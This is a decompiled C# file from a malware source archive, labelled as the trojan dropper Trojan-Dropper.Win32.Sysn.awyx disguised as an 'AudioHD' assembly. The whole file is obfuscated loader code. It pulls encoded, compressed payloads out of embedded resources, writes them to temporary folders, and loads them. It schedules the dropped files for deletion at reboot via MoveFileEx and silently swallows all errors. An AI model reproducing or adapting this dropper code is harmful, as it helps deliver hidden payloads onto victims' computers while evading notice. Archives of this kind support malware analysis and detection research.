MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0002/_0001.cs

// Decompiled with JetBrains decompiler
// Type: .

// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe

using \u0001;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;

namespace \u0002
{
  internal sealed class \u0001
  {
    private static Hashtable \u0001 = new Hashtable();

    [DllImport("kernel32", EntryPoint = "MoveFileEx")]
    private static extern bool \u000F([In] string obj0, [In] string obj1, [In] int obj2);

    [SpecialName]
    internal static bool \u000F()
    {
      try
      {
        string lower = Process.GetCurrentProcess().MainModule.ModuleName.ToLower();
        if (lower == \u0004.\u000F(289))
          return true;
        if (lower == \u0004.\u000F(302))
          return true;
      }
      catch (Exception ex)
      {
      }
      return false;
    }

    internal static void \u000F()
    {
      try
      {
        AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u0002.\u0001.\u000F);
        if (!Assembly.GetExecutingAssembly().GlobalAssemblyCache || !\u0002.\u0001.\u000F())
          return;
        string[] strArray = \u0004.\u000F(323).Split(',');
        for (int index = 0; index < strArray.Length - 1; index += 2)
        {
          try
          {
            string str1 = Encoding.UTF8.GetString(Convert.FromBase64String(strArray[index]));
            string str2 = strArray[index + 1];
            if (str2.Length > 0)
            {
              if (str2[0] == '[')
              {
                int num = str2.IndexOf(']');
                string str3 = str2.Substring(1, num - 1);
                string name = str2.Substring(num + 1);
                bool flag = str3.IndexOf('z') >= 0;
                if (str3.IndexOf('f') >= 0)
                {
                  Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
                  if (manifestResourceStream != null)
                  {
                    int length = (int) manifestResourceStream.Length;
                    byte[] buffer = new byte[length];
                    manifestResourceStream.Read(buffer, 0, length);
                    if (flag)
                      buffer = \u0007.\u000F(buffer);
                    try
                    {
                      string path1 = string.Format(\u0004.\u000F(541), (object) Path.GetTempPath(), (object) name);
                      Directory.CreateDirectory(path1);
                      \u0002.\u0001.\u0001 obj = new \u0002.\u0001.\u0001(str1);
                      string path2 = path1 + obj.\u0001 + \u0004.\u000F(554);
                      if (!File.Exists(path2))
                      {
                        FileStream fileStream = File.OpenWrite(path2);
                        fileStream.Write(buffer, 0, buffer.Length);
                        fileStream.Close();
                      }
                      \u0002.\u0002.\u000F(path2);
                      try
                      {
                        File.Delete(path2);
                        Directory.Delete(path1);
                      }
                      catch
                      {
                      }
                    }
                    catch (Exception ex)
                    {
                    }
                  }
                }
              }
            }
          }
          catch (Exception ex)
          {
          }
        }
      }
      catch (Exception ex)
      {
      }
    }

    internal static Assembly \u000F([In] object obj0, [In] ResolveEventArgs obj1)
    {
      \u0002.\u0001.\u0001 obj = new \u0002.\u0001.\u0001(obj1.Name);
      string base64String1 = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u000F(false)));
      string[] strArray = \u0004.\u000F(323).Split(',');
      string str1 = string.Empty;
      bool flag1 = false;
      bool flag2 = false;
      bool flag3 = false;
      for (int index = 0; index < strArray.Length - 1; index += 2)
      {
        if (strArray[index] == base64String1)
        {
          str1 = strArray[index + 1];
          break;
        }
      }
      if (str1.Length == 0 && obj.\u0003.Length == 0)
      {
        string base64String2 = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0001));
        for (int index = 0; index < strArray.Length - 1; index += 2)
        {
          if (strArray[index] == base64String2)
          {
            str1 = strArray[index + 1];
            break;
          }
        }
      }
      if (str1.Length > 0)
      {
        if (str1[0] == '[')
        {
          int num = str1.IndexOf(']');
          string str2 = str1.Substring(1, num - 1);
          flag1 = str2.IndexOf('z') >= 0;
          flag2 = str2.IndexOf('g') >= 0;
          flag3 = str2.IndexOf('t') >= 0;
          str1 = str1.Substring(num + 1);
        }
        lock (\u0002.\u0001.\u0001)
        {
          if (\u0002.\u0001.\u0001.ContainsKey((object) str1))
            return (Assembly) \u0002.\u0001.\u0001[(object) str1];
        }
        Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
        if (manifestResourceStream != null)
        {
          int length = (int) manifestResourceStream.Length;
          byte[] numArray = new byte[length];
          manifestResourceStream.Read(numArray, 0, length);
          if (flag1)
            numArray = \u0007.\u000F(numArray);
          if (flag2)
          {
            try
            {
              string path1 = string.Format(\u0004.\u000F(541), (object) Path.GetTempPath(), (object) str1);
              Directory.CreateDirectory(path1);
              string path2 = path1 + obj.\u0001 + \u0004.\u000F(554);
              if (!File.Exists(path2))
              {
                Assembly assembly = (Assembly) null;
                FileStream fileStream = File.OpenWrite(path2);
                fileStream.Write(numArray, 0, numArray.Length);
                fileStream.Close();
                if (\u0002.\u0002.\u000F(path2))
                  assembly = Assembly.Load(obj.\u000F(true));
                File.Delete(path2);
                Directory.Delete(path1);
                if ((object) assembly != null)
                {
                  lock (\u0002.\u0001.\u0001)
                  {
                    if (\u0002.\u0001.\u0001.ContainsKey((object) str1))
                      assembly = (Assembly) \u0002.\u0001.\u0001[(object) str1];
                    else
                      \u0002.\u0001.\u0001.Add((object) str1, (object) assembly);
                  }
                  return assembly;
                }
              }
            }
            catch
            {
            }
          }
          Assembly assembly1 = (Assembly) null;
          if (!flag3)
          {
            try
            {
              assembly1 = Assembly.Load(numArray);
            }
            catch (FileLoadException ex)
            {
              flag3 = true;
            }
            catch (BadImageFormatException ex)
            {
              flag3 = true;
            }
          }
          if (flag3)
          {
            try
            {
              string path3 = string.Format(\u0004.\u000F(541), (object) Path.GetTempPath(), (object) str1);
              Directory.CreateDirectory(path3);
              string path4 = path3 + obj.\u0001 + \u0004.\u000F(554);
              if (!File.Exists(path4))
              {
                FileStream fileStream = File.OpenWrite(path4);
                fileStream.Write(numArray, 0, numArray.Length);
                fileStream.Close();
                \u0002.\u0001.\u000F(path4, (string) null, 4);
                \u0002.\u0001.\u000F(path3, (string) null, 4);
              }
              assembly1 = Assembly.LoadFile(path4);
            }
            catch
            {
            }
          }
          lock (\u0002.\u0001.\u0001)
            \u0002.\u0001.\u0001.Add((object) str1, (object) assembly1);
          return assembly1;
        }
      }
      return (Assembly) null;
    }

    internal struct \u0001
    {
      public string \u0001;
      public Version \u0001;
      public string \u0002;
      public string \u0003;

      public string \u000F([In] bool obj0)
      {
        StringBuilder stringBuilder = new StringBuilder();
        stringBuilder.Append(this.\u0001);
        if (obj0)
        {
          stringBuilder.Append(\u0004.\u000F(563));
          stringBuilder.Append((object) this.\u0001);
        }
        stringBuilder.Append(\u0004.\u000F(580));
        stringBuilder.Append(this.\u0002.Length == 0 ? \u0004.\u000F(597) : this.\u0002);
        stringBuilder.Append(\u0004.\u000F(610));
        stringBuilder.Append(this.\u0003.Length == 0 ? \u0004.\u000F(635) : this.\u0003);
        return stringBuilder.ToString();
      }

      public \u0001([In] string obj0)
      {
        this.\u0001 = new Version();
        this.\u0002 = string.Empty;
        this.\u0003 = string.Empty;
        this.\u0001 = string.Empty;
        string str1 = obj0;
        char[] chArray = new char[1]{ ',' };
        foreach (string str2 in str1.Split(chArray))
        {
          string str3 = str2.Trim();
          if (str3.StartsWith(\u0004.\u000F(644)))
            this.\u0001 = new Version(str3.Substring(8));
          else if (str3.StartsWith(\u0004.\u000F(657)))
          {
            this.\u0002 = str3.Substring(8);
            if (this.\u0002 == \u0004.\u000F(597))
              this.\u0002 = string.Empty;
          }
          else if (str3.StartsWith(\u0004.\u000F(670)))
          {
            this.\u0003 = str3.Substring(15);
            if (this.\u0003 == \u0004.\u000F(635))
              this.\u0003 = string.Empty;
          }
          else
            this.\u0001 = str3;
        }
      }
    }
  }
}